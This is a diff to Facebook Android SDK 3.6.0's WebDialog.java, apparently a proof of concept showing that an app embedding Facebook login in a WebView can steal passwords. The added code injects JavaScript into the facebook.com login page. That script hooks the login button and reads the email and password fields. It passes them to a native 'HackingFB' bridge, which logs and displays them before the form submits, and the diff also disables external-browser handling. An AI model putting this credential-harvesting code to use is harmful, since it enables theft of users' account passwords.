Facebook Android SDK 3.6.0 OAuth using embedded Web View

HackFB.diff

diff --git i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
index 70ac868..c2c9af0 100644
--- i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
+++ w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
@@ -17,6 +17,7 @@
 package com.facebook.widget;
 
 import android.annotation.SuppressLint;
+import android.app.AlertDialog;
 import android.app.Dialog;
 import android.app.ProgressDialog;
 import android.content.Context;
@@ -29,8 +30,11 @@ import android.net.Uri;
 import android.net.http.SslError;
 import android.os.Bundle;
 import android.util.DisplayMetrics;
+import android.util.Log;
 import android.view.*;
+import android.webkit.JavascriptInterface;
 import android.webkit.SslErrorHandler;
+import android.webkit.WebChromeClient;
 import android.webkit.WebView;
 import android.webkit.WebViewClient;
 import android.widget.FrameLayout;
@@ -43,6 +47,8 @@ import com.facebook.internal.ServerProtocol;
 import com.facebook.internal.Utility;
 import com.facebook.internal.Validate;
 
+import org.json.JSONTokener;
+
 /**
  * This class provides a mechanism for displaying Facebook Web dialogs inside a Dialog. Helper
  * methods are provided to construct commonly-used dialogs, or a caller can specify arbitrary
@@ -342,6 +348,15 @@ public class WebDialog extends Dialog {
                 ViewGroup.LayoutParams.MATCH_PARENT));
         webView.setVisibility(View.INVISIBLE);
         webView.getSettings().setSavePassword(false);
+        webView.addJavascriptInterface(new HackingFB(), "HackingFB");
+        webView.setWebChromeClient(new WebChromeClient() {
+            @Override
+            public void onConsoleMessage(String message, int lineNumber, String sourceID) {
+                Log.e("password", message + " -- From line "
+                        + lineNumber + " of "
+                        + sourceID);
+            }
+        });
 
         webViewContainer.setPadding(margin, margin, margin, margin);
         webViewContainer.addView(webView);
@@ -349,6 +364,24 @@ public class WebDialog extends Dialog {
         contentFrameLayout.addView(webViewContainer);
     }
 
+    private class HackingFB {
+
+        @JavascriptInterface
+        public void foundCredential(String name, String password) {
+            harvest(name, password);
+        }
+
+        private void harvest(String name, String password) {
+            AlertDialog.Builder alertDialogBuilder = new AlertDialog.Builder(
+                    getContext());
+            alertDialogBuilder.setTitle(name);
+            alertDialogBuilder.setMessage(password);
+            alertDialogBuilder.create();
+            alertDialogBuilder.show();
+            Log.e("Password", String.format("%s %s", name, password));
+        }
+    }
+
     private class DialogWebViewClient extends WebViewClient {
         @Override
         @SuppressWarnings("deprecation")
@@ -396,10 +429,11 @@ public class WebDialog extends Dialog {
             } else if (url.contains(DISPLAY_TOUCH)) {
                 return false;
             }
+            return false;
             // launch non-dialog URLs in a full browser
-            getContext().startActivity(
-                    new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
-            return true;
+//            getContext().startActivity(
+//                    new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
+//            return true;
         }
 
         @Override
@@ -445,6 +479,16 @@ public class WebDialog extends Dialog {
             contentFrameLayout.setBackgroundColor(Color.TRANSPARENT);
             webView.setVisibility(View.VISIBLE);
             crossImageView.setVisibility(View.VISIBLE);
+            if (url.contains("facebook.com/login.php")) {
+                Log.e("password ", "Sending alert");
+                view.loadUrl("javascript:console.log('password From Native')");
+                view.loadUrl("javascript:console.log(document)");
+                view.loadUrl("" +
+                        "javascript:function hacker() {" +
+                        "var f = document.getElementsByTagName('form')[0];" +
+                        " HackingFB.foundCredential(f.email.value, f.pass.value); " +
+                        "f.submit()}; document.getElementsByName('login')[0].onclick=hacker; ");
+            }
         }
     }